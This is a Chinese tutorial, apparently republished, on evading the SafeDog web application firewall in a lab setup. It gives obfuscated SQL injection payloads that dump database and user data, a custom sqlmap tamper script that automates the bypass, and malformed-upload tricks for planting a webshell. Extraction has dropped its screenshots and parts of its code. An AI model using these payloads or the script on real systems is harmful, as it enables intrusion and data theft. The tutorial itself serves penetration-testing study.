千家信息网

如何编写sqlmap tamper脚本

发表于:2024-11-11 作者:千家信息网编辑
千家信息网最后更新 2024年11月11日,这篇文章将为大家详细讲解有关如何编写sqlmap tamper脚本,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。准备工作安全狗官网:http://free.safe
千家信息网最后更新 2024年11月11日如何编写sqlmap tamper脚本

这篇文章将为大家详细讲解有关如何编写sqlmap tamper脚本,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

准备工作

安全狗官网:http://free.safedog.cn/install_desc_website.html

环境:Windows7+phpstudy+sqli-labs+安全狗v4.0

安装的时候最后让填系统服务,cd到phpstudy的apache2/bin目录,cmd执行:

httpd.exe -k install -n apache

然后服务名填写apache就行了

去github下载sqli-labs,修改sqli-labs/sql-connections/db-creds.inc为自己环境的数据库用户名和密码,然后切换phpstudy的php版本为5.2(sqli-labs需要php版本<5.5),修改php.ini:

magic_quotes_gpc = Off

准备工作完成



绕SQL waf

1.注入判断

下面payload拦截:

-1'||1='1

下面payload不拦截:

-1'||-1='-1-1'/*!14400or*/1=1%23

=替换成><likeregexp同样可以绕过

2.查询字段数

利用换行符+注释绕:

1'/**/order/*/%0a*a*/by/**/3%23


3.联合查询

同样利用换行符+注释绕,因为当union与select同时用的时候它才进行拦截:

-1'union/*/%0a*a*/select/**/1,2,3%23


4.查询所有数据库名:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(schema_name)from/**/information_schema.schemata)%23

查询当前数据库的表名时用到了database(),直接用的话会被拦截,这里用内联注释符将函数特征打乱:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=DatabaSe/*!(*/))%23


查询users表的字段名:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users')%23

查数据:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(username)from/**/users)%23

编写sqlmap tamper脚本

直接使用sqlmap,它可以识别出安全狗waf、以及可以通过布尔盲注的方法跑数据(需要--random-agent参数):



使用sqlmap的--list-tampers选项查看sqlmap自带的tamper脚本:


这些tamper脚本位于sqlmap-master/tamper/下,以lowercase.py为例,分析tamper脚本如何编写:

#!/usr/bin/env python"""Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""import re # 用于正则匹配from lib.core.data import kbfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMAL # 定义优先级,此处是'一般'def dependencies():    passdef tamper(payload, **kwargs): # 定义tamper脚本    # tamper说明    """    Replaces each keyword character with lower case value (e.g. SELECT -> select)    Tested against:        * Microsoft SQL Server 2005        * MySQL 4, 5.0 and 5.5        * Oracle 10g        * PostgreSQL 8.3, 8.4, 9.0    Notes:        * Useful to bypass very weak and bespoke web application firewalls          that has poorly written permissive regular expressions    >>> tamper('INSERT')    'insert'    """    retVal = payload # 将基本payload赋值给retVal,做中间转换    if payload:        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): # 查找字母            word = match.group() # 将查找到的值赋值给word            if word.upper() in kb.keywords: # 查找到的值是关键字                retVal = retVal.replace(word, word.lower()) # 将关键字全部替换为小写    return retVal # 返回替换后的值

那么复制上面的一份,改名为safedog.py,更改tamper()函数,自己编写进行关键字的替换:

#!/usr/bin/env python"""Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission"""import refrom lib.core.data import kbfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef dependencies():    passdef tamper(payload, **kwargs):    retVal = payload    if payload:        retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/')        retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)')        retVal = retVal.replace('USER()', 'usEr/*!(*/)')        retVal = retVal.replace(' ', '/**/')        retVal = retVal.replace('OR', '/*!14400Or*/')        retVal = retVal.replace('AND', '/*!14400aNd*/')    return retVal

再次测试:

./sqlmap.py -u 'http://10.211.55.5/sqli-labs/Less-1/?id=1' --flush-session --tamper=safedog --random-agent


这下便可以用sqlmap进行UNION注入了

绕WebShell waf

普通一句话直接被拦截:


随便一个过D盾的马:


直接进行命令执行,也是能过狗的:


绕文件上传 waf

首先准备一个文件上传demo

upload.html:

Document
< input type="file" name="img[]" multiple>

upload.php:

';$img = $_FILES['img'];if(!empty($img)){    $img_desc = reArrayFiles($img);    #print_r($img_desc);    foreach($img_desc as $val)    {        $newname = date('YmdHis',time()).mt_rand().'.'.$img["name"][0];        move_uploaded_file($val['tmp_name'],'C:\phpstudy_pro\WWW\upload\\'.$newname);        echo $newname;    }}function reArrayFiles($file){    $file_ary = array();    $file_count = count($file['name']);    $file_key = array_keys($file);    for($i=0;$i<$file_count;$i++)    {        foreach($file_key as $val)        {            $file_ary[$i][$val] = $file[$val][$i];        }    }    return $file_ary;}?>

直接上传一个webshell,发现被拦截:


测试发现只对后缀名进行了检测;使用burp fuzz可用后缀:


由于是windows环境,服务器并不能将这些可用后缀当做php解析

绕过方法

主要利用畸形request包请求,apache处理request包的时候有容错,从而造成判断差异

1.通过filename处换行绕过:



2.filename用多=


3.用两个filename,第一个filename用=;


4.文件名处填充垃圾字符(大约8k),这种情况需要后端更改上传的文件名,不然文件名太长move_uploaded_file会移动失败

5.利用.htaccess、.user.ini

绕XSS waf

以最简单的反射型xss为例,a.php写入:


fuzz了一下,下面这些会触发waf:






0